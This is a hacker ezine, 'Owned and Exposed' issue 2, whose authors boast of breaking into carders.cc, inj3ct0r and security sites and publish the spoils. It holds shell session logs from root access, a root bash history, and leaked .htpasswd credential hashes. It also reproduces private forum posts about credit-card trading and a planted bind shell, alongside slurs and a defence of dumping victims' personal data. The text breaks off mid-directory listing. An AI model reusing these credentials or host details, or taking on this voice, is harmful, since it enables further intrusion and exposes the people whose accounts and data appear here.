[EZINE] Owned and Exposed - ISSUE no 2

-=[ISSUE - NO 2]=-
-=[OF]=-
owned and exposed

~ Featuring ~

carders.cc
inj3ct0r
ettercap
exploit-db
backtrack
free-hack

~ and ~

Out of the Blue into the Black

~ INTRO ~

Greetings followers, welcome to the second issue of owned and exp0sed. This file is encoded with UTF-8, so to view it properly use unicode.
For those who are reading and laughing with us: We (your happy ninjas) wish you a

* MERRY * NINJA * HAXMAS *

After our first release we got wind of some strange rumours. So just to be sure, we need to clarify some facts.

So, who are we? First, let's talk about some things we are not. We are not an underground rival kiddy group. We are not a cyber mafia gang. We are the watchmen, the hackers who quietly observe the scene. If any skiddy community gets too big, we shut them down. If any lamer causes too much trouble, we shut them down. If any group keeps fucking stuff up, we stop them.

So, why are we doing this? Some people say that being a vigilante is wrong and that we are actually criminals. What can we say? This may be true. But the way we see it, if you're not part of the solution, you're part of the fucking problem. These idiots spread garbage across our scene and that is why they got owned. We take pride in what is left of the scene and we have serious problems with those who rape it. That's why we do what MUST be done.

There are some things left we would like to say about carders.cc. First of all, they came back online after they got rm'ed. In the first issue we gave our word that we would make sure carders.cc would never come back. Well, we delivered on that promise in this issue. And as such carders.cc has once again been eliminated. Maybe this time they will get the hint.

Also, Heise Security said that we were a rival group trying to capitalize on the demise of carders.cc.
Apparently they weren't happy about our disclosure of the carders.cc database that included the personal information of carders.cc victims. What Heise forgot was that with this action, all the victims of carders.cc got the chance to realize that they were victims of fraud. You can try to say that our disclosure of the database put them at even greater risk of fraud but we disagree. What is more risky? Having your information secretly on an "underground" carding forum where it WILL be sold and used in fraudulent activity? Or, having it released so that you can be notified and take the appropriate action to mitigate the damage that has been done? I know which option I'd rather have.

It is quite impressive how many people wrote about the Carders Hack without even bothering to read the zine. It is hilarious to see how the media works. Somebody writes an article, others copy information from it, others copy from it again. If we take a shit in a bowl, then you eat that shit and puke it back into a different bowl for someone else to eat, then they do the same thing, what do you have? "Two Journo's One Cup" is what you have. Fucking pathetic.

On the other hand, we'd like to thank Brian Krebs. Even if some of his conclusions were way off the mark, he was still the first one to report about carders.cc and nearly every other article was based on Brian's work. At least you didn't eat shit and regurgitate it like the rest, Brian. Keep up the good work.

Enough jibber jabber, let's get to business. You will soon realize that our targets vary:

We owned ettercap because we were tired of people firing that shit up and pretending to be a l33th4x0r sheep who think they are the greatest hackerz with their ARP spoofing toolkitz. If you have installed ettercap in the last 5 years you may want to check yo shit (;p).
We owned offsec including backtrack and exploit-db because they are fucking security "expert" maggots (oops s/m/f/) who just fail so hard at security that we wonder why people really take their training courses. We imagine it's like open mic night at the laughatorium.

We owned inj3ct0r because they are lameass wannabe milw0rm kids whose sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake anyone?).

We owned carders.cc (AGAIN) because they are unable to learn from their mistakes and keep spreading garbage around the underground.

We owned free-hack because they are developing into one of the largest, most arrogant script-kiddie breeding grounds on the intertubez.

~ carders.cc ~

Here we go again. We hope that everybody was looking forward to seeing carders.cc getting owned again. We kept our word, didn't we? Let us begin:

    The ninja guys piss on you and your half trained monkeys or
    whatever your leet underground team consists of. If you continue,
    you will be owned over again and rm'd twice. Also we will punch
    you in the face.

Our lazy ninja squad was too drunk to come over and punch you in the fucking face. So we'll just stick to owning you for now.

Carders.cc went down for a few days, but came back as if nothing had happened. They switched some server admins and installed some new software in the hopes that they would be safe.
They turned on some l33t "security" settings like PHP's "Safe Mode" and "open_basedir", and they also disabled lots of functions. All in all they thought they were pretty locked down. Well, obviously they were fucking wrong. It's hard to harden a system when everything is backdoored and unfortunately we are just too ninja to get stopped by your silly protections. You can never stop us. We will always keep owning and exp0sing you. No. Matter. What. You. Try.

$ uname -a
FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc)
$ w
1:24AM up 11 days, 4:23, 0 users, load averages: 0.37, 0.48, 0.54
USER TTY FROM LOGIN@ IDLE WHAT
$ alias ls="ls -la"
$ ls
$ cat /etc/passwd
$ cd /root
$ ls
total 412628
drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 .
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
-rw------- 1 root wheel 1856 Dec 5 23:53 .bash_history
-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
-rw------- 1 root wheel 2909 Dec 7 22:31 .history
-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login
-rw------- 1 root wheel 61 Jul 5 21:44 .lesshst
-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login
drwx------ 3 root wheel 512 Dec 6 02:34 .mc
-rw------- 1 root wheel 641 Nov 8 20:33 .mysql_history
-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
drwx------ 2 root wheel 512 Nov 7 17:20 .ssh
-rw-r--r-- 1 root wheel 417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql
drwxr-xr-x 3 root wheel 512 Jul 3 00:34 backup
drwxr-xr-x 4 root wheel 512 Nov 8 17:58 backups
drwxr-xr-x 2 root wheel 512 Jul 20 2009 crack
-rw-r--r-- 1 root wheel 3223 Jul 20 2009 crack.zip
-rw-r--r-- 1 root wheel 85 Aug 9 03:31 ddos.php
-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php
drwxr-xr-x 3 root wheel 512 Jul 5 00:41 greensql
-rw-r--r-- 1 root wheel 20 Aug 9 03:26 info.php
-rw------- 1 root wheel 16877 Jul 29 20:44 mbox
drwxr-xr-x 3 root wheel 512 Jul 3 18:59 php
drwxr-xr-x 14 carderscc carderscc 1536 Nov 2 16:15 proftpd-1.3.3c
-rw-r--r-- 1 root wheel 4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz
drwxr-xr-x 2 root wheel 512 Nov 8 18:50 stylebackup

Mad PHP-Codez again!

$ cat ddos.php
$ cat info.php
$ cat example.php
$ cd /home/carderscc
$ ls
total 18
drwxr-x--- 7 carderscc www 512 Nov 18 20:45 .
drwxr-x--x 4 root wheel 512 Nov 1 23:54 ..
dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 carders.cc
drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 jabber.carders.cc
drwxrwxr-x 11 carderscc www 3072 Nov 8 17:27 pma
drwxrwxrwx 2 carderscc www 2048 Dec 6 00:40 temp
drwxrwxr-x 5 carderscc www 512 Nov 6 19:47 vbseo
$ cd carders.cc
$ ls
$ cat .htpasswd
ddos:XScRLnTwdeJ6k
$ cat includes/config.php
$ cd /home/cardersblog
$ ls
total 8
drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 .
drwxr-x--x 4 root wheel 512 Nov 1 23:54 ..
dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 blog.carders.cc
drwxrwxrwx 2 cardersblog www 512 Nov 2 01:16 temp
$ cd blog.carders.cc
$ ls
$ cat wp-config.php

[ASCII art: bathroom scene with the sign "put shit to shit carders.cc"]
HAPPY NINJA BATHROOM

Team Member Passes:

You guys don't get it, do you? We told you to fuck off and still you did not listen. We are not sorry for doing it again. You deserve it.

~ inj3ct0r ~

#`````````` ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/````````\       W A R N I N G !!! DISCOVERED LAMER O_o
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\       1) maybe you were wrong address, go Inj3ct0r.com
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/       2) Or you are not wrong address, then Fuck Off!
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/

Attention. This ridiculous banner is *not* part of our zine. In fact it is inj3ct0r's 404 page. We concluded that this banner perfectly reflects their retardedness. Their knowledge about security is on the same level as their ability to speak proper English.

For those who don't know: inj3ct0r is a clone of the old milw0rm project, administered by some morons called "r0073r", "Sid3^effects" and "L0rd CrusAd3r". They are not only an exploit-db, but also an arrogant community of retarded Turks and Arabs who tell you how to write your stupid Perl SQL-Injection exploit.
All their attention whoring about how they hacked Facebook was driving us insane and all their moaning about how they have problems with the law was just too ridiculous for us to let them continue existing. Actually we did not find out what kind of law problems they actually had. We did however discover how stupid these kids are and what crap they are talking about in their private forum areas. Check it out:

-------------
-0day 31337 privat Area
-10-24-2010, 05:08 PM Post by KnocKout:
-
-0-Day Credit Cards | Part 2(Only 31337 Prv.)-
-
-Hi My Brothers..
-
--------------
-
-0day 31337 privat Area
-10-17-2010, 04:36 PM Post by KnocKout:
-
-Default => Rapid,Hotfile,CC Requests..
-
-hi my brothers,
-RapidShare, Hotfile Premium and Credit Card. Requests..
-
-Please indicate your requests here, and I will send Pm..
--------------

Not only are they sharing CCs, they also think of themselves as the best hackerz on the planet.
Here is how they talk about exploit-db and offsec:

-------------
-0day 31337 privat Area:
-07-19-2010, 10:05 PM Post by SeeMe:
-
-guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open
-
-Port State Service Reason Product Version Extra info
-22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0
-80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora)
-301 tcp filtered unknown no-response
-443 tcp open https syn-ack
-1072 tcp filtered unknown no-response
-1087 tcp filtered unknown no-response
-1100 tcp filtered unknown no-response
-1111 tcp filtered unknown no-response
-1117 tcp filtered unknown no-response
-1443 tcp filtered ies-lm no-response
-1718 tcp filtered unknown no-response
-1720 tcp filtered H.323/Q.931 no-response
-1900 tcp filtered upnp no-response
-2000 tcp filtered cisco-sccp no-response
-2041 tcp filtered interbase no-response
-2046 tcp filtered sdfunc no-response
-2382 tcp filtered ms-olap3 no-response
-3017 tcp filtered unknown no-response
-4129 tcp filtered unknown no-response
-4900 tcp filtered unknown no-response
-5060 tcp filtered sip admin-prohibited
-5555 tcp filtered freeciv no-response
-5560 tcp filtered isqlplus no-response
-6669 tcp filtered irc no-response
-8007 tcp filtered ajp12 no-response
-9102 tcp filtered jetdirect no-response
-10000 tcp open snet-sensor-mgmt syn-ack
-44443 tcp filtered coldfusion-auth no-response
-
-but I just can't connect back to it
-
-any idea!
-------------
-
-07-21-2010, 10:10 PM Post by SeeMe:
-
-This is a new technology for me how to gain credentials over HTTP TRACE and TRACK
-when it's enable on a webserver
-
-The TRACE/TRACK method was enabled on the server listed below:
-
-http://www.offensive-security.com:80/
-
-[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP]
-
-
-could gain view info from the link above
-------------
-
-07-30-2010, 12:26 AM Post by SeeMe:
-
-http://mobile.backtrack-linux.org/
-
-exploited for good and not sure that will be able to back it up
-
-and I'm still heading for the main both sites, offsec.com and exploit-db
-
-After one month into the desert I'll be back infront of my computer on 15th of Agu
-
-and I'll prepare for a globel war
-------------

They are calling exploit-db "lamers-db" yet they don't see who the real lamers are.

Hardly surprising that the inj3ct0r team did not manage their box themselves and instead gave their work to some fat guy called "asker". But since he left his box to rot with some half updated shit, it was child's play to tap in and root.

$ uname -a
Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux
$ id
uid=0(root) gid=0(root) groups=0(root)
$ cd /
$ ls -la
$ cat /etc/passwd
$ cd /root
$ ls -la
total 14
drwxr-x--- 7 root root 1024 Oct 15 17:27 .
drwxr-xr-x 22 root root 1024 Oct 3 22:04 ..
drwx------ 2 root root 1024 Aug 20 02:09 .aptitude
-rw------- 1 root root 6748 Oct 22 22:28 .bash_history
drwxr-xr-x 2 root root 1024 Aug 20 02:09 .debtags
drwxr-xr-x 2 root root 1024 Oct 15 17:29 .mc
drwxr-xr-x 2 root root 1024 Aug 2 21:39 scripts
drwxr-xr-x 2 root root 1024 Oct 15 16:51 test
$ cat .bash_history
rmdir mydns cd temp ls -al du -h rm * cd .. ls -al cd lo* ls -al cd .. rmdir lost+found exit cd /home/wateam ls -al cd other ls -al cd ../htdocs nano index.html exit cd /home/n* cd htdocs ls -al cd inc* ls -al nano config.php exit cd /etc/apache2 nano apache2.conf nano vhosts.conf nano apache2.conf apache2 -k restart nano apache2.conf apache2 -k restart cd /mo*e cd mo*e nano fcgi* cd .. nano vhosts nano vhosts cd /var/lib/log* ls -al cat status cat status|more nano status rm status logrotate logrotate -f /etc/logrotate.conf ls -al nano status ls -al df -h cd /var/log ls -al exit cd /home/ tar --help tar cls tar --help|more tar --help|more tar --help|more cd cd tiler ls -al cd tiler ls -al tar cvzf tiler.tar ls -al cd ht* ls -al tar cvzf tiler.tar tar --help|more man tar ls -akl ls -al cd .. tar -zcvf tiler.tar htdocs ls -la nano /etc/passwd init 6 exit ren rename mkdir test cd test touch 1d_5.jpg touch 1d_7.JPG touch 1.jpg touch 1d7.JPg ls -al rename rename --help man rename rename -n (.*)\.JPG 1.jpg rename -n '/.*\.JPG/' *.jpg rename -n /.*\.JPG/ *.jpg rename -n /.*\.JPG/ * rename -nv /.*\.JPG/ * ls -al rename -nv s/.*\.JPG/ * rename -nv /.*\.JPG/ * rename -nv /.*\.JPG/ *.JPG rename -nv /.*\.JPG/ *.JPG rename -nv '/.*\.JPG/' *.JPG rename -nv '/.+\.JPG/' *.JPG rename -nv '/.+\.JPG/' *.JPG rename -nv . * rename -nv /./ * rename -nv /./ *.JPG rename -n 'y/A-Z/a-z/' * rename -n '/A-Z/a-z/' * rename -n /\.JPG/ * rename -n /\.JPG/ *.JPG rename -n '\.JPG' *.JPG rename -n 's/\.JPG/' *.JPG rename -n 's/\.JPG//' *.JPG rename -n 's/\.JPG//' *.JPG rename -n '/\.JPG//' *.JPG rename -n '/\.JPG//' *.JPG rename -n '/\.JPG/' *.JPG rename -n 's/\.JPG//' *.JPG ls -al mv 1.jpg ONE.JPG ls -la rename -n 's/\.JPG//' *.JPG rename -n 's/\.JPG//' ** rename -n 's/\.JPG//' *.* rename -n 's/\.JPG//' rename -n 's/\.JPG//' *.JPG rename -n 's/\.JPG//' *E.JPG rename -n 's/\.JPG//' *. 
man rename rename -nv s\.jpg// *.JPG rename -nv s\./jpg// *.JPG rename -nv s\./jpg// *.JPG man rename rename -nv .JPG .jpg * rename -nv /.JPG .jpg/ * rename -nv /\.JPG \.jpg/ * rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak rename .bak .txt *.bak rename -nv s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\./ * rename -nv s/\.JPG/\.jpg/ * cd /home/ cd tiler cd ht* cd up* cd ima* ls -al rename s/\.JPG/\.jpg/ * ls -al ls -al rename s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\.jpg/ *|more rename -nv s/\.JPG/\.jpg/ *|more mc cd .. cd .. cd .. ls -al tar zcvf tiler.tar.gz htdocs cd ht* rmdir uploaded -R rm uploaded -R exit cd /home/r0*' cd /home/r0* cd h* nano index.php cd ../../snt* cd ht* nano index.php cd ../../n* cd ht* ls -al nano index.php ls -al find / - name *.tpl find ./ -name *.tpl find ./ -name template find ./ -name tp find ./ -name tem find ./ -name them ls -al grep --help grep -rl "sweethome" ./ grep -rl "tiler" ./ cd ../../ ls -al cd sweethome ls -al cd htdocs ls -al nano tem* cd tem* cd blocks ls -al nano left.php nano left.php cd /home/tiler/ht* ls -al cd .././ cd ../ ls -al cd sn* cd ht* nano index.php cd ../../ cd r0*/h* nano index.php cd ../../wa* cd ../wateam cd ht* nani index.html nani index.htm nani index.php ls -al nano index.html exit /etc/init.d/ssh_brute stop /etc/init.d/ssh_brute start cd /var/log/pro* ls -al tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log|grep 18 tail -n 100 proftpd.log|grep 18 tail -n 100 proftpd.log|grep 18 tail -n 100 proftpd.log|grep 18 exit cd /home/tiler ls -al tar zcvf 18.10.2010.tar.gz htdocs ls -al exit cd /var/log cd 
mail ls -al cat mail.log|grep stempher cat mail.log|grep "Oct 19 12" cat mail.log|grep "Oct 19 12"|more exit adduser sbs adduser sbs deluser sbs adduser sbs cd /home/sbs cd /etc/apache2 ls -al cd si*e ls -al cp yslivka.org.ua sbs-ua.com nano sbs-ua.com a2ensite sbs-ua.com cd /etc exit apache2 -k restart exit cd /etc/apache2 cd si*e ls -al nano asmerok.org.ua apache2 -k restart adduser www-data sbs adduser www-data sbs apache2 -k restart exit cd /etc/ssh* ls -al cd sshd* nano sshd* exit /etc/init.d/ssh restart exit cd /etc/apache2 cd si*e nano sbs-ua.com apache2 -k restart exit unrar urar apt-get install unrar apt-get clean apt-get update apt-get install unrar apt-get install urar apt-get install unrar-free unrar unrar --help unrar --usage apt-get upgrade apt-get clean exit deluser sbs cd /home rm sbs -R a2dissite sbs-ua.com cd /etc/apache2 cd si*e rm sbs-ua.com apache2 -k restart ls -al exit cd /home ls -la exit cd /etc/apache2 cd si*e cp chupik.org.ua vdnh.org.ua cp chupik.org.ua vdnh.org.ua ls -al cd .. nano vhosts cd si*e ls -al nano chupik.org.ua nano vdnh.org.ua a2ensite chupik.org.ua a2ensite vdnh.org.ua apache2 -k restart exit cd scripts ls -la total 4 drwxr-xr-x 2 root root 1024 Aug 2 21:39 . drwxr-x--- 7 root root 1024 Oct 15 17:27 .. -rwx------ 1 root root 76 Feb 1 2010 clear_cband.sh -rwx------ 1 root root 220 May 31 00:59 uaix_block.sh cat * #!/bin/sh apache2 -k stop sleep 5 rm /etc/apache2/cband/* apache2 -k start #!/bin/sh rm prefixes.txt rm /etc/apache2/cband-ua.conf wget -q http://www.colocall.net/uaix/prefixes.txt for i in `cat prefixes.txt` do echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf done apache2ctl graceful $ cd .. $ cd test $ ls -la total 2 drwxr-xr-x 2 root root 1024 Oct 15 16:51 . drwxr-x--- 7 root root 1024 Oct 15 17:27 .. 
-rw-r--r-- 1 root root 0 Oct 15 16:34 1d7.JPg -rw-r--r-- 1 root root 0 Oct 15 16:33 1d_5.jpg -rw-r--r-- 1 root root 0 Oct 15 16:33 1d_7.JPG -rw-r--r-- 1 root root 0 Oct 15 16:33 ONE.JPG $ cd /home $ ls -la total 169 drwxr-x--x 37 root root 4096 Oct 20 17:45 . drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. -rw------- 1 root root 9216 Oct 22 17:45 aquota.group -rw------- 1 root root 9216 Oct 22 17:45 aquota.user drwxr-x--- 7 asmer asmer 4096 Oct 22 18:58 asmer drwxr-x--- 6 cherrybikes cherrybikes 4096 Oct 24 18:56 cherrybikes drwxr-x--- 4 chupik chupik 4096 Dec 14 2009 chupik drwxr-x--- 4 conference-sidelnikov conference-sidelnikov 4096 Jan 7 2010 conference-sidelnikov drwxr-x--- 4 dyquem dyquem 4096 Sep 6 17:20 dyquem drwxr-x--- 4 hochumogu hochumogu 4096 Jul 16 16:51 hochumogu drwxr-x--- 13 jaguar jaguar 4096 Oct 24 10:49 jaguar drwxr-x--- 4 krivopustov krivopustov 4096 Nov 6 2007 krivopustov drwxr-x--- 3 lalizas lalizas 4096 Feb 18 2009 lalizas drwxr-x--- 4 magicgarden magicgarden 4096 Jul 12 23:32 magicgarden drwxr-x--- 4 mazafaka inj3ct0r 4096 Oct 3 20:33 mazafaka drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 n3tw0rkTeRr0r15M drwxr-x--- 4 natasha natasha 4096 Oct 19 2009 natasha drwxr-x--- 4 nmusic nmusic 4096 Mar 2 2009 nmusic drwxr-x--- 4 pma pma 4096 May 13 16:28 pma drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r drwxr-x--- 4 ra5ta ra5ta 4096 Jul 12 18:25 ra5ta drwxr-x--- 4 silentwarrior silentwarrior 4096 Oct 4 2009 silentwarrior drwxr-x--- 4 skyweb skyweb 4096 Apr 16 2010 skyweb drwxr-x--- 4 snt-nmu snt-nmu 4096 Feb 27 2009 snt-nmu drwxr-x--- 4 steelnews steelnews 4096 Sep 4 15:20 steelnews drwxr-x--- 4 sunsanych sunsanych 4096 Jun 13 14:07 sunsanych drwxr-x--- 4 sweethome sweethome 4096 Aug 16 01:21 sweethome drwxrwxrwx 2 root root 4096 Oct 24 16:12 temp drwxr-x--- 4 tiler tiler 4096 Oct 20 22:37 tiler drwxr-x--- 4 tmv-nmu tmv-nmu 4096 May 6 08:49 tmv-nmu drwxr-x--- 4 vakulenko vakulenko 4096 Feb 27 
2009 vakulenko drwxr-x--- 4 vika vika 4096 Sep 8 19:15 vika drwxr-x--- 4 volosovets volosovets 4096 Nov 6 2007 volosovets drwxr-x--- 4 vonline vonline 4096 Sep 5 22:13 vonline drwxr-x--- 5 wapper wapper 4096 Jun 13 2009 wapper drwxr-x--- 4 wateam wateam 4096 Dec 27 2009 wateam drwxr-x--- 4 web-ghost web-ghost 4096 Jun 7 10:05 web-ghost drwxr-x--- 4 xanavi xanavi 4096 Jun 9 2009 xanavi drwxr-x--- 4 yslivka yslivka 4096 Apr 23 2010 yslivka $ cd r0otech0inj3ct0rr00t0ro0t3r $ ls -la total 8048 drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 . drwxr-x--x 37 root root 4096 Oct 20 17:45 .. drwxr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Jan 22 2010 cgi-bin -rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 8210510 Oct 24 19:29 error.log dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 24 19:27 htdocs $ cd htdocs $ ls -la total 184 dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 5 19:21 . drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 .. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1821 Oct 5 19:19 .htaccess -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 85 Oct 1 14:17 BingSiteAuth.xml -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4047 Oct 1 14:17 author.php dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 banner dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 13:20 banner_black -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1445 Oct 1 14:17 browser.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2308 Oct 1 14:17 category.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 604 Oct 1 14:17 config.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 date.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 562 Oct 1 14:17 db.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2090 Oct 1 14:17 exploit.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1406 Oct 1 14:17 favicon.ico dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 28 
14:15 files -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 53 Oct 1 14:17 googlee6e0c515ab2abd97.html -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 83 Oct 1 14:17 hacker.php dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 02:37 images -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1745 Oct 16 12:34 index.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2672 Oct 8 13:19 inj3ct0r.css -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 9293 Oct 5 19:15 lib.php dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 pages -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1008 Oct 1 14:17 pages.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2873 Oct 1 14:17 platform.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1894 Oct 1 14:17 related.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 131 Oct 1 14:17 robots.txt -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 rss.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2203 Oct 5 19:10 search.php -rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1739 Oct 1 14:17 sitemap.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 27 23:53 sploits dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 templates -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 261 Oct 1 14:17 y_key_6e34fe98df61c405.html -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 0 Oct 1 14:17 yandex_76b91b15d528ba00.txt $ cat config.php shellcodeCategories, 25 ); redCategory = 34; ?> $ cd .. $ cd n3tw0rkTeRr0r15M $ ls -la total 20 drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 . drwxr-x--x 37 root root 4096 Oct 20 17:45 .. 
-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 96 Aug 12 12:15 .htpasswd drwxr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22 2010 cgi-bin drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 htdocs $ cat .htpasswd inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/ inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1 $ cd htdocs $ ls -la total 2240 drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 . drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .. -rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 178 Aug 24 01:59 .htaccess -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24170 Jun 29 15:27 ajax.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75837 Jun 29 15:27 album.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17463 Jun 29 15:27 announcement.php dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 archive -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18637 Jun 29 15:28 attachment.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75654 Jun 29 15:28 calendar.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 43 Jun 6 14:02 clear.gif dr-xr-xr-x 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:45 clientscript -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 15264 Jun 29 15:28 converse.php dr-xr-xr-x 7 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 cpstyles -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 3645 Jun 29 15:28 cron.php dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 customavatars dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customgroupicons dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customprofilepics -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 48083 Jun 29 15:28 editpost.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29811 Jun 29 15:29 external.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10114 Jun 29 15:29 faq.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36347 Jun 29 15:41 forumdisplay.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40159 Jun 29 15:29 global.php dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 greenfox -r-xr-xr-x 1 